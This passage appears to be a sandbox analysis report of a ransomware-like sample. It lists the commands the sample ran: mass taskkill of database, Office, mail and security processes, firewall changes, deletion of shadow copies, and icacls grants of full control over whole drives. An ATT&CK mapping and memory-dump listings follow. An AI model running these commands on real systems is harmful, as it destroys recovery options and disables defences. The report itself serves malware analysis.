- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:6952
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:756
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:7116
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:4428
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:5480
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:4644
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:6032
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:6148
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:260
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:184
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:3824
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:4648
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:3964
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:5856
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    PID:6252
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    PID:6996
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    PID:5144
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:4856
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:6332
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6600
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6680
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6528

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/764-323-0x000000001B1C0000-0x000000001B1C2000-memory.dmp

Filesize
8KB

Download
memory/836-132-0x0000021B5A6B3000-0x0000021B5A6B5000-memory.dmp

Filesize
8KB

Download
memory/836-133-0x0000021B5A6B6000-0x0000021B5A6B8000-memory.dmp

Filesize
8KB

Download
memory/836-131-0x0000021B5A6B0000-0x0000021B5A6B2000-memory.dmp

Filesize
8KB

Download
memory/836-122-0x0000021B5A670000-0x0000021B5A671000-memory.dmp

Filesize
4KB

Download
memory/836-127-0x0000021B5C910000-0x0000021B5C911000-memory.dmp

Filesize
4KB

Download
memory/924-277-0x000001ADAA266000-0x000001ADAA268000-memory.dmp

Filesize
8KB

Download
memory/924-228-0x000001ADAA260000-0x000001ADAA262000-memory.dmp

Filesize
8KB

Download
memory/924-232-0x000001ADAA263000-0x000001ADAA265000-memory.dmp

Filesize
8KB

Download
memory/924-292-0x000001ADAA268000-0x000001ADAA269000-memory.dmp

Filesize
4KB

Download
memory/2352-196-0x0000021543280000-0x0000021543282000-memory.dmp

Filesize
8KB

Download
memory/2352-274-0x0000021543286000-0x0000021543288000-memory.dmp

Filesize
8KB

Download
memory/2352-202-0x0000021543283000-0x0000021543285000-memory.dmp

Filesize
8KB

Download
memory/2352-287-0x0000021543288000-0x0000021543289000-memory.dmp

Filesize
4KB

Download
memory/2504-291-0x000001ED318F8000-0x000001ED318F9000-memory.dmp

Filesize
4KB

Download
memory/2504-237-0x000001ED318F3000-0x000001ED318F5000-memory.dmp

Filesize
8KB

Download
memory/2504-278-0x000001ED318F6000-0x000001ED318F8000-memory.dmp

Filesize
8KB

Download
memory/2504-233-0x000001ED318F0000-0x000001ED318F2000-memory.dmp

Filesize
8KB

Download
memory/2684-329-0x00007FF76AF20000-0x00007FF76AF21000-memory.dmp

Filesize
4KB

Download
memory/2684-326-0x000002127A0E3000-0x000002127A0E5000-memory.dmp

Filesize
8KB

Download
memory/2684-325-0x000002127A0E0000-0x000002127A0E2000-memory.dmp

Filesize
8KB

Download
memory/2836-194-0x0000022C256A3000-0x0000022C256A5000-memory.dmp

Filesize
8KB

Download
memory/2836-272-0x0000022C256A6000-0x0000022C256A8000-memory.dmp

Filesize
8KB

Download
memory/2836-193-0x0000022C256A0000-0x0000022C256A2000-memory.dmp

Filesize
8KB

Download
memory/2836-284-0x0000022C256A8000-0x0000022C256A9000-memory.dmp

Filesize
4KB

Download
memory/3756-275-0x000002356BB96000-0x000002356BB98000-memory.dmp

Filesize
8KB

Download
memory/3756-215-0x000002356BB93000-0x000002356BB95000-memory.dmp

Filesize
8KB

Download
memory/3756-213-0x000002356BB90000-0x000002356BB92000-memory.dmp

Filesize
8KB

Download
memory/3756-285-0x000002356BB98000-0x000002356BB99000-memory.dmp

Filesize
4KB

Download
memory/3840-226-0x000001B4FB953000-0x000001B4FB955000-memory.dmp

Filesize
8KB

Download
memory/3840-216-0x000001B4FB950000-0x000001B4FB952000-memory.dmp

Filesize
8KB

Download
memory/3840-289-0x000001B4FB958000-0x000001B4FB959000-memory.dmp

Filesize
4KB

Download
memory/3840-276-0x000001B4FB956000-0x000001B4FB958000-memory.dmp

Filesize
8KB

Download
memory/3904-130-0x00000000027B0000-0x00000000027B2000-memory.dmp

Filesize
8KB

Download
memory/3904-114-0x0000000000620000-0x0000000000621000-memory.dmp

Filesize
4KB

Download
memory/3912-288-0x000001816B878000-0x000001816B879000-memory.dmp

Filesize
4KB

Download
memory/3912-273-0x000001816B876000-0x000001816B878000-memory.dmp

Filesize
8KB

Download
memory/3912-205-0x000001816B873000-0x000001816B875000-memory.dmp

Filesize
8KB

Download
memory/3912-204-0x000001816B870000-0x000001816B872000-memory.dmp

Filesize
8KB

Download
memory/4164-301-0x0000020550738000-0x0000020550739000-memory.dmp

Filesize
4KB

Download
memory/4164-199-0x0000020550733000-0x0000020550735000-memory.dmp

Filesize
8KB

Download
memory/4164-279-0x0000020550736000-0x0000020550738000-memory.dmp

Filesize
8KB

Download
memory/4164-197-0x0000020550730000-0x0000020550732000-memory.dmp

Filesize
8KB

Download
memory/4236-328-0x000001AEF9B83000-0x000001AEF9B85000-memory.dmp

Filesize
8KB

Download
memory/4236-327-0x000001AEF9B80000-0x000001AEF9B82000-memory.dmp

Filesize
8KB

Download
memory/4304-280-0x000001D0749A6000-0x000001D0749A8000-memory.dmp

Filesize
8KB

Download
memory/4304-303-0x000001D0749A8000-0x000001D0749A9000-memory.dmp

Filesize
4KB

Download
memory/4304-200-0x000001D0749A0000-0x000001D0749A2000-memory.dmp

Filesize
8KB

Download
memory/4304-201-0x000001D0749A3000-0x000001D0749A5000-memory.dmp

Filesize
8KB

Download
memory/4444-282-0x0000016AEDBF6000-0x0000016AEDBF8000-memory.dmp

Filesize
8KB

Download
memory/4444-208-0x0000016AEDBF0000-0x0000016AEDBF2000-memory.dmp

Filesize
8KB

Download
memory/4444-302-0x0000016AEDBF8000-0x0000016AEDBF9000-memory.dmp

Filesize
4KB

Download
memory/4444-211-0x0000016AEDBF3000-0x0000016AEDBF5000-memory.dmp

Filesize
8KB

Download
memory/4552-281-0x0000022FFC3B6000-0x0000022FFC3B8000-memory.dmp

Filesize
8KB

Download
memory/4552-220-0x0000022FFC3B3000-0x0000022FFC3B5000-memory.dmp

Filesize
8KB

Download
memory/4552-305-0x0000022FFC3B8000-0x0000022FFC3B9000-memory.dmp

Filesize
4KB

Download
memory/4552-219-0x0000022FFC3B0000-0x0000022FFC3B2000-memory.dmp

Filesize
8KB

Download
memory/4656-283-0x0000022DEE616000-0x0000022DEE618000-memory.dmp

Filesize
8KB

Download
memory/4656-224-0x0000022DEE613000-0x0000022DEE615000-memory.dmp

Filesize
8KB

Download
memory/4656-222-0x0000022DEE610000-0x0000022DEE612000-memory.dmp

Filesize
8KB

Download
memory/4656-306-0x0000022DEE618000-0x0000022DEE619000-memory.dmp

Filesize
4KB

Download
memory/4904-304-0x00000000013F0000-0x00000000013F2000-memory.dmp

Filesize
8KB

Download
memory/5380-324-0x0000000003950000-0x0000000003951000-memory.dmp

Filesize
4KB

Download
memory/6952-321-0x000001BE35373000-0x000001BE35375000-memory.dmp

Filesize
8KB

Download
memory/6952-322-0x000001BE35376000-0x000001BE35378000-memory.dmp

Filesize
8KB

Download
memory/6952-320-0x000001BE35370000-0x000001BE35372000-memory.dmp

Filesize
8KB

Download